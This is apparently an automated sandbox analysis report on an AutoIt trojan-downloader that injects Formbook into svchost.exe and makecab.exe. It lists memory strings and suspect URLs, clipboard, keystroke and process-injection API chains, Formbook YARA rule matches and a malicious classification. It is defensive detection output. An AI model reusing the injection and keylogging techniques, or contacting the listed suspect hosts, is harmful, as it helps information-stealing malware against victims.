            Source: makecab.exe, 00000006.00000002.4099520220.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: makecab.exe, 00000006.00000002.4099520220.0000000002923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: makecab.exe, 00000006.00000003.2164960713.00000000077A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/plugins/woocommerce-conversion-tracking/)
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wpzipped.com/
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: makecab.exe, 00000006.00000002.4101618826.000000000588E000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.00000000033DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.focusonsocials.com/rbwl/?UbV=yHm6enFIYs/ovpirZiNA1kNGPi3kBJu5kTNDWZFxfmq4
            Source: makecab.exe, 00000006.00000003.2170040814.00000000077CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/
            Source: makecab.exe, 00000006.00000002.4101618826.00000000061FA000.00000004.10000000.00040000.00000000.sdmp, rULxYvbAFLatPN.exe, 00000007.00000002.4100949739.0000000003D4A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.itsjojosiwas.com/#website
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008F425A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008F4458
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008E0219
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_0090CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0090CDAC

            E-Banking Fraud

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: This is a third-party compiled AutoIt script. 0_2_00883B4C
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_31954aa9-e
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_75917130-e
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_c5ddfec0-c
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9c41869f-e
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042B573 NtClose,1_2_0042B573
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03872C70 NtFreeVirtualMemory,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04714650 NtSuspendThread,LdrInitializeThunk,6_2_04714650
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04714340 NtSetContextThread,LdrInitializeThunk,6_2_04714340
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04712C70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C60 NtCreateKey,LdrInitializeThunk,6_2_04712C60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04712CA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04712D30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04712D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04712DF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DD0 NtDelayExecution,LdrInitializeThunk,6_2_04712DD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04712EE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04712E80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F30 NtCreateSection,LdrInitializeThunk,6_2_04712F30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FE0 NtCreateFile,LdrInitializeThunk,6_2_04712FE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FB0 NtResumeThread,LdrInitializeThunk,6_2_04712FB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AF0 NtWriteFile,LdrInitializeThunk,6_2_04712AF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AD0 NtReadFile,LdrInitializeThunk,6_2_04712AD0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712B60 NtClose,LdrInitializeThunk,6_2_04712B60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04712BF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04712BE0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04712BA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047135C0 NtCreateMutant,LdrInitializeThunk,6_2_047135C0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_047139B0 NtGetContextThread,LdrInitializeThunk,6_2_047139B0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712C00 NtQueryInformationProcess,6_2_04712C00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CF0 NtOpenProcess,6_2_04712CF0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712CC0 NtQueryVirtualMemory,6_2_04712CC0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712D00 NtSetInformationFile,6_2_04712D00
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712DB0 NtEnumerateKey,6_2_04712DB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712E30 NtWriteVirtualMemory,6_2_04712E30
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712EA0 NtAdjustPrivilegesToken,6_2_04712EA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F60 NtCreateProcessEx,6_2_04712F60
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712FA0 NtQuerySection,6_2_04712FA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712F90 NtProtectVirtualMemory,6_2_04712F90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712AB0 NtWaitForSingleObject,6_2_04712AB0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04712B80 NtQueryInformationFile,6_2_04712B80
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713010 NtOpenDirectoryObject,6_2_04713010
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713090 NtSetValueKey,6_2_04713090
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713D70 NtOpenThread,6_2_04713D70
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_04713D10 NtOpenProcessToken,6_2_04713D10
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02838030 NtClose,6_2_02838030
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02838190 NtAllocateVirtualMemory,6_2_02838190
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837EA0 NtReadFile,6_2_02837EA0
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837F90 NtDeleteFile,6_2_02837F90
            Source: C:\Windows\SysWOW64\makecab.exeCode function: 6_2_02837D40 NtCreateFile,6_2_02837D40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_008E40B1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_008D8858
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeCode function: 0_2_008E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008E545F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: String function: 008A8B40 appears 42 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: String function: 008A0D27 appears 70 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: String function: 00887F41 appears 35 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 0475F290 appears 103 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 046CB970 appears 262 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 04715130 appears 58 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 0474EA12 appears 86 times
            Source: C:\Windows\SysWOW64\makecab.exe | Code function: String function: 04727E54 appears 107 times
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1657367738.0000000003CAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe, 00000000.00000003.1657159366.0000000003B03000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe
            Source: SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4102732817.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4100790450.0000000004470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1984172906.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4099201806.0000000002810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1983942569.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4100789193.0000000005070000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4100844845.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1984670172.0000000006350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/11
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008EA2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008D8713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exe | Code function: 0_2_008D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
